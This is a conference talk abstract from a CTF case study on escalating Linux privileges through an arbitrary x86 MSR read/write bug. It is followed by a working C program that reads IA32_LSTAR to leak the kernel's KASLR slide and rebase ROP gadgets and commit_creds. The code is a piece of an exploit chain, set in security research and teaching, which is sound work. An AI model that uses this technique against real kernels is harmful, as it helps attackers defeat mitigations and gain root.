Dominik Czarnota: Linux privesc through an arbitrary x86 MSR read/write bug: a case study from a CTF challenge

youtube.com, 10 months ago


In this talk we will see how to exploit the Linux kernel to escalate privileges given an arbitrary MSR (Model Specific Register) read/write capability on x86 CPUs, which is what the "Msrable" challenge from the KalmarCTF 2024 security competition handed us. If you have heard about "MSREXEC", this talk shows how we would exploit a similar vulnerability if we ever found one on Linux.

This won't be such a trivial task, since the kernel has the KASLR, SMEP, SMAP and KPTI security mitigations, which will be explained during the talk. In the end, we will find a way to bypass SMAP (without disabling it in CR4!) and use a return-oriented programming (ROP) exploitation technique to escalate our privileges.
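The abstract does not say how the talk gets past KASLR, so the following is an added example rather than code from the talk or the Msrable challenge. It shows the first thing an arbitrary MSR read buys an attacker on x86-64 Linux: IA32_LSTAR (0xC0000082) holds the address of the kernel's SYSCALL entry point, entry_SYSCALL_64, so one read of it leaks a kernel text address and therefore the KASLR slide. The read goes through the stock Linux msr driver (/dev/cpu/N/msr, where the file offset is the MSR number), which needs root and the msr module; in a CTF the same value would come from the challenge's own primitive. Assumed: a default x86_64 kernel config (no-KASLR text base 0xffffffff81000000 and 2 MiB randomization granularity), and the constructed System.map value for entry_SYSCALL_64 used in main, which must be taken from the target's actual build.

```c
/* Added example (not from the talk or the Msrable challenge): read IA32_LSTAR
 * through the Linux msr driver and turn it into a KASLR slide.
 * Assumed: default x86_64 kernel config for the base/alignment constants. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MSR_IA32_LSTAR 0xC0000082u  /* RIP loaded by SYSCALL in 64-bit mode: entry_SYSCALL_64 */

/* No-KASLR start of kernel text and the granularity in which KASLR moves it
 * (CONFIG_PHYSICAL_START / CONFIG_PHYSICAL_ALIGN defaults; assumed). */
#define KERNEL_TEXT_START 0xffffffff81000000ULL
#define KASLR_ALIGN       0x200000ULL

/* Read MSR `msr` on CPU `cpu` via /dev/cpu/<cpu>/msr. The msr driver treats the
 * file offset as the MSR number, so an 8-byte pread at offset `msr` is an rdmsr.
 * Needs the msr module and root/CAP_SYS_RAWIO. Returns 0 on success, -errno otherwise. */
int msr_read(int cpu, uint32_t msr, uint64_t *out)
{
    char path[64];
    snprintf(path, sizeof path, "/dev/cpu/%d/msr", cpu);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -errno;
    ssize_t n = pread(fd, out, sizeof *out, (off_t)msr);
    int err = (n == (ssize_t)sizeof *out) ? 0 : (n < 0 ? -errno : -EIO);
    close(fd);
    return err;
}

/* Derive the KASLR slide from a leaked LSTAR value.
 * `entry_nokaslr` is entry_SYSCALL_64's address in the target build's System.map
 * (its address with KASLR off). Values that cannot be kernel text are rejected:
 * a symbol below the no-KASLR base, LSTAR below the symbol, or a slide that is
 * not a multiple of KASLR_ALIGN. Returns 0 and sets *slide, or -1. */
int kaslr_slide_from_lstar(uint64_t lstar, uint64_t entry_nokaslr, uint64_t *slide)
{
    if (entry_nokaslr < KERNEL_TEXT_START || lstar < entry_nokaslr)
        return -1;
    uint64_t s = lstar - entry_nokaslr;
    if (s % KASLR_ALIGN != 0)
        return -1;
    *slide = s;
    return 0;
}

/* Relocate any other System.map symbol (ROP gadgets, commit_creds, ...) once the slide is known. */
uint64_t rebase(uint64_t sym_nokaslr, uint64_t slide)
{
    return sym_nokaslr + slide;
}

int main(void)
{
    /* Constructed System.map value for illustration; use the real one from the target build. */
    const uint64_t entry_syscall_64_nokaslr = 0xffffffff81a00080ULL;
    uint64_t lstar, slide;

    int err = msr_read(0, MSR_IA32_LSTAR, &lstar);
    if (err) {
        fprintf(stderr, "rdmsr IA32_LSTAR failed: %s (msr module loaded? running as root?)\n",
                strerror(-err));
        return 1;
    }
    printf("IA32_LSTAR  = 0x%016llx\n", (unsigned long long)lstar);
    if (kaslr_slide_from_lstar(lstar, entry_syscall_64_nokaslr, &slide) == 0)
        printf("KASLR slide = 0x%llx\n", (unsigned long long)slide);
    else
        printf("LSTAR does not match this System.map (different build, or not kernel text)\n");
    return 0;
}
```

The alignment check is what catches a System.map from the wrong build: a mismatched symbol almost never differs from the leaked address by a multiple of 2 MiB. Note that the write half of the primitive is where MSREXEC lives (pointing LSTAR at attacker-chosen code), and that Linux has tightened the msr driver's write path over the years, so a challenge like Msrable supplies that capability through its own bug rather than through /dev/cpu/N/msr.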

More: https://confidence-conference.org/